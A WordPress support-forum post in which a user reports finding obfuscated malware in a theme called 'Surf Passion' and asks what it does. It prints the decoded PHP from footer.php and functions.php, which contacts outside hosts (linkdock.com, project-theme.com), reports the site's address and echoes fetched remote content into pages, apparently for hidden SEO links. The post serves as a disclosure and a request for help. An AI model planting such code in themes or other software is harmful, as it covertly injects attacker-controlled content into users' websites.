Support » Themes and Templates » Malware in themes

  • Hi

    So I’m testing a new theme for a client. “Surf Passion”.
    Theme loads slow.

    Accidentally discover nasty stuff in the footer.php, and even more in functions.php.

    The nasty stuff is gzinflated/rot13/base64-encoded php code.

    The footer has this:

    error_reporting(0);
    $CodeURL = “http://linkdock.com/content.php?id=&host=”.urlencode($_SERVER[“HTTP_HOST”]).”&uri=”.urlencode($_SERVER[“REQUEST_URI”]);

    if ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file_get_contents”)) {
    echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file”)) {
    $content = @file($CodeURL);
    echo @join(“”, $content);
    } elseif (function_exists(“curl_init”)) {
    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
    }

    which appears to stick invisible links into footers, presumably to get some pagerank.

    functions.php requires 40 levels of decryption to produce this:

    <?php

    if ( function_exists(‘register_sidebars’) )
    register_sidebars(2,array(
    ‘before_widget’ => ”,
    ‘after_widget’ => ”,
    ‘before_title’ => ‘<h2>’,
    ‘after_title’ => ‘</h2>’,
    ));

    function wp_lk()
    {
    $loc = urlencode($_SERVER[‘HTTP_HOST’]);
    $lname = “www.project-theme.com”;
    $file=”pages/$loc.txt”;
    $carnivore=”/wp_stat.php?loc=$loc”;

    $test=ini_get(‘allow_url_fopen’);
    if ($test==0 || $test=”” || $test==”off”)
    {
    $fps = @fsockopen($lname, 80, $errno, $errstr, 30);
    if($fps)
    {
    $out = “POST $carnivore HTTP/1.1\r\n”;
    $out .= “Host: $lname\r\n”;
    $out .= “Connection: Close\r\n\r\n”;
    @fwrite($fps, $out);
    @fclose($fps);
    }
    }
    else
    {
    @file_get_contents(“http://” .$lname .$carnivore);
    }

    if ($test==0 || $test=”” || $test==”off”)
    {
    $code = @file_get_contents(“http://” .$lname .”/” .$file);
    }
    else
    {
    $fp = @fsockopen($lname, ’80’, $err_no, $err_str, 30);
    if ($fp)
    {
    @stream_set_timeout($fp, 60);

    @fwrite($fp, “GET /$file HTTP/1.1\r\n”);
    @fwrite($fp, “Host: $lname\r\n”);
    @fwrite($fp, “Connection: Close\r\n\r\n”);

    $code = “”;

    while(!feof($fp))
    {
    $code .= @fgets($fp, 1024);
    }

    $code = trim(strstr($code, “\r\n\r\n”));
    }

    @fclose($fp);
    }

    if ( is_string($code) )
    echo($code);
    }

    ?>

    I can’t find any calls to wp_lk() in the code, maybe it’s hidden somewhere…

    Questions:

    1. any one know what the code in functions.php does?

    2. is there a place where users can identify themes as containing malware, so that they are blacklisted?

    thanks, Ian

Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Malware in themes’ is closed to new replies.